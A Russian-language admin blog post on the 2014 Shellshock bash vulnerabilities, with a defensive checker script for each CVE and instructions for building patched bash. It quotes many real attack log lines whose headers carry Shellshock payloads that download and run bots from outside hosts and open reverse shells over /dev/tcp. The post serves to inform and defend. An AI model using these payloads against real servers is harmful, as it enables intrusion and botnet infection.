HomeApache › Уязвимости в GNU’s bash shell

Уязвимости в GNU’s bash shell

Обнаружены несколько уязвимостей(CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) в bash.
Уязвимости позволяют выполнить удаленно команды на целевой машине.
Уязвимость присутствует в bash от версии 1.14(1994 года) и до версии 4.3
Проникновение может происходить через  sshd, модули mod_cgi и mod_cgid сервера Apache HTTP Server.

Вот такие запросы посылают на сервер:

"GET / HTTP/1.0" 200 314 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
"GET /cgi-bin/test.sh HTTP/1.0" 403 29045 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
"GET /test HTTP/1.0" 404 202 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
"GET / HTTP/1.0" 200 314 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
"GET /cgi-bin/hi HTTP/1.0" 403 29045 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
"GET / HTTP/1.1" 200 314 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
"GET /cgi-bin/hi HTTP/1.0" 403 29045 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
"GET /cgi-bin/hi HTTP/1.0" 403 29045 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
"GET //cgi-bin//he HTTP/1.0" 403 29045 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http://89.33.193.10/ji ; lwp-download http://89.33.193.10/ji ; curl -O /var/tmp/ji http://89.33.193.10/ji ; perl /var/tmp/ji ; rm -rf *ji;rm -rf jur\""
"GET / HTTP/1.0" 200 314 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
"HEAD /.bash_history HTTP/1.1" 404 -
"HEAD /.bash_history HTTP/1.1" 404 - "-" "-"
"GET / HTTP/1.0" 200 656 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
"GET / HTTP/1.0" 200 656 "() { :; }; ping -c 3 198.46.158.94" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
"GET / HTTP/1.0" 200 656 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
"GET / HTTP/1.1" 200 656 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
"GET / HTTP/1.0" 200 656 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
"GET / HTTP/1.0" 200 656 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
"GET /cgi-bin/hi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
"GET /hacker.txt&sa=U&ei=JHspVNnGLsPx8gXS-YHoBA&ved=0CIsBEBYwFjhk&usg=AFQjCNF4L3D_kahVPJ1hhDDzMpo5jsvAbA//cgi-bin/env.pl HTTP/1.1" 404 344 "() { :; }; \"exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\";" "() { :; }; \"exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\";"
"GET /hacker.txt&sa=U&ei=WoUpVO32A8yk8AX72YDYBg&ved=0CP8DEBYwXw&usg=AFQjCNEVbkpRD1WHaQMVRkPmLtMYF2-stA//cgi-bin/env.sh HTTP/1.1" 400 226 "() { :; }; \"exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\"; \"system('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\";" "() { :; }; \"exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\"; \"system('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\";"
"GET /cgi-bin/hi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
"GET /hacker.txt HTTP/1.1" 200 700020 "-" "() { :;}; /bin/bash -c \"curl -O http://89.248.172.139/ha.pl -o /tmp/ha.pl; lwp-download -a http://89.248.172.139/ha.pl /tmp/ha.pl;wget http://89.248.172.139/ha.pl -O /tmp/ha.pl;perl /tmp/ha.pl;rm -f /tmp/ha.pl;mkdir /tmp/ha.pl\""
"GET /botnet_hack.txt HTTP/1.1" 200 1054859 "-" "() { :;}; /bin/bash -c \"curl -O http://89.248.172.139/ha.pl -o /tmp/ha.pl; lwp-download -a http://89.248.172.139/ha.pl /tmp/ha.pl;wget http://89.248.172.139/ha.pl -O /tmp/ha.pl;perl /tmp/ha.pl;rm -f /tmp/ha.pl;mkdir /tmp/ha.pl\""
"GET /cgi-bin/load.cgi HTTP/1.1" 403 16813 "-" "() { :;}; echo `echo xbash:test`"
"GET /cgi-bin/gsweb.cgi HTTP/1.1" 403 16813 "-" "() { :;}; echo `echo xbash:test`"
"GET /cgi-bin/redirector.cgi HTTP/1.1" 403 16813 "-" "() { :;}; echo `echo xbash:test`"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1"
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1"
"GET /hacker_bash.txt HTTP/1.1" 200 5818 "() { :;}; echo; /usr/bin/env wget http://92.243.89.208/robots.txt?for=http://www.designsim.com.au/hacker_bash.txt -O /dev/null;" "() { :;}; echo; /usr/bin/env wget http://92.243.89.208/robots.txt?for=http://www.designsim.com.au/hacker_bash.txt -O /dev/null;"
"GET /cgi-bin/bts.cgi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://100.42.30.34/lex ; curl -O http://100.42.30.34/lex ; perl lex ;rm -rf lex\""
"GET /cgi-bin/btw.cgi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf sa* ; wget http://100.42.30.34/lex1 ; lwp-download http://100.42.30.34/lex1 ; curl -O /var/tmp/lex1 http://100.42.30.34/lex1 ; perl /var/tmp/lex1 ; rm -rf /var/tmp/lex*;rm -rf lex1\""
"GET / HTTP/1.1" 200 656 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget www.freistilreisen.de/jack.jpg -O /tmp/jack.jpg;curl -O /tmp/jack.jpg www.freistilreisen.de/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\");'"
"GET /cgi-bin/btw.cgi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf sa* ; wget http://100.42.30.34/lex1 ; lwp-download http://100.42.30.34/lex1 ; curl -O /var/tmp/lex1 http://100.42.30.34/lex1 ; perl /var/tmp/lex1 ; rm -rf /var/tmp/lex*;rm -rf lex1\""
"GET /cgi-bin/btw.cgi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf sa* ; wget http://100.42.30.34/lex1 ; lwp-download http://100.42.30.34/lex1 ; curl -O /var/tmp/lex1 http://100.42.30.34/lex1 ; perl /var/tmp/lex1 ; rm -rf /var/tmp/lex*;rm -rf lex1\""
"GET /favicon.ico HTTP/1.1" 200 894 "-" "() { :;}; /bin/bash -c \\\"cd /tmp;wget http://183.129.218.147/a.pl;curl -O /tmp/a.pl http://183.129.218.147/a.pl ; perl /tmp/a.pl 69.65.41.24 8448;rm -rf /tmp/a.pl\\\""

 

Скрипт для проверки уязвимости:

#!/bin/bash

warn() {
	if [ "$scary" == "1" ]; then
		echo -e "\033[91mVulnerable to $1\033[39m"
	else
		echo -e "\033[93mFound non-exploitable $1\033[39m"
	fi
}

good() {
	echo -e "\033[92mNot vulnerable to $1\033[39m"
}

tmpdir=`mktemp -d -t tmp.XXXXXXXX`

[ -n "$1" ] && bash=$(which $1) || bash=$(which bash)
echo -e "\033[95mTesting $bash ..."
$bash -c 'echo "Bash version $BASH_VERSION"'
echo -e "\033[39m"

#r=`a="() { echo x;}" $bash -c a 2>/dev/null`
if [ -n "$(env 'a'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then
	echo -e "\033[91mVariable function parser active, maybe vulnerable to unknown parser bugs\033[39m"
	scary=1
elif [ -n "$(env 'BASH_FUNC_a%%'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then
	echo -e "\033[92mVariable function parser pre/suffixed [%%, upstream], bugs not exploitable\033[39m"
	scary=0
elif [ -n "$(env 'BASH_FUNC_a()'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then
	echo -e "\033[92mVariable function parser pre/suffixed [(), redhat], bugs not exploitable\033[39m"
	scary=0
elif [ -n "$(env '__BASH_FUNC<a>()'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then
	echo -e "\033[92mVariable function parser pre/suffixed [__BASH_FUNC<..>(), apple], bugs not exploitable\033[39m"
	scary=0
else
	echo -e "\033[92mVariable function parser inactive, bugs not exploitable\033[39m"
	scary=0
fi


r=`env x="() { :; }; echo x" $bash -c "" 2>/dev/null`
if [ -n "$r" ]; then
	warn "CVE-2014-6271 (original shellshock)"
else
	good "CVE-2014-6271 (original shellshock)"
fi

pushd $tmpdir > /dev/null
env x='() { function a a>\' $bash -c echo 2>/dev/null > /dev/null
if [ -e echo ]; then
	warn "CVE-2014-7169 (taviso bug)"
else
	good "CVE-2014-7169 (taviso bug)"
fi
popd > /dev/null

$($bash -c "true $(printf '<<EOF %.0s' {1..80})" 2>$tmpdir/bashcheck.tmp)
ret=$?
grep AddressSanitizer $tmpdir/bashcheck.tmp > /dev/null
if [ $? == 0 ] || [ $ret == 139 ]; then
	warn "CVE-2014-7186 (redir_stack bug)"
else
	good "CVE-2014-7186 (redir_stack bug)"
fi


$bash -c "`for i in {1..200}; do echo -n "for x$i in; do :;"; done; for i in {1..200}; do echo -n "done;";done`" 2>/dev/null
if [ $? != 0 ]; then
	warn "CVE-2014-7187 (nested loops off by one)"
else
	echo -e "\033[96mTest for CVE-2014-7187 not reliable without address sanitizer\033[39m"
fi

$($bash -c "f(){ x(){ _;};x(){ _;}<<a;}" 2>/dev/null)
if [ $? != 0 ]; then
	warn "CVE-2014-6277 (lcamtuf bug #1)"
else
	good "CVE-2014-6277 (lcamtuf bug #1)"
fi

if [ -n "$(env x='() { _;}>_[$($())] { echo x;}' $bash -c : 2>/dev/null)" ]; then
	warn "CVE-2014-6278 (lcamtuf bug #2)"
elif [ -n "$(env BASH_FUNC_x%%='() { _;}>_[$($())] { echo x;}' $bash -c : 2>/dev/null)" ]; then
	warn "CVE-2014-6278 (lcamtuf bug #2)"
elif [ -n "$(env 'BASH_FUNC_x()'='() { _;}>_[$($())] { echo x;}' $bash -c : 2>/dev/null)" ]; then
	warn "CVE-2014-6278 (lcamtuf bug #2)"
else
	good "CVE-2014-6278 (lcamtuf bug #2)"
fi

rm -rf $tmpdir

 

 

Необходимо обновить bash, для этого необходимо установить самый свежий bash из исходников:

curl -O http://ftp.gnu.org/gnu/bash/bash-4.3.30.tar.gz
tar xvfz bash-4.3.30.tar.gz
cd bash-4.3.30
for i in $(seq -f "%03g" 0 30); do curl https://ftp.gnu.org/pub/gnu/bash/bash-4.3-patches/bash43-$i | patch -p0; done
./configure --prefix=/usr --bindir=/bin --htmldir=/usr/share/doc/bash-4.3 --without-bash-malloc --with-installed-readline
make && make install

 

 

Leave a Comment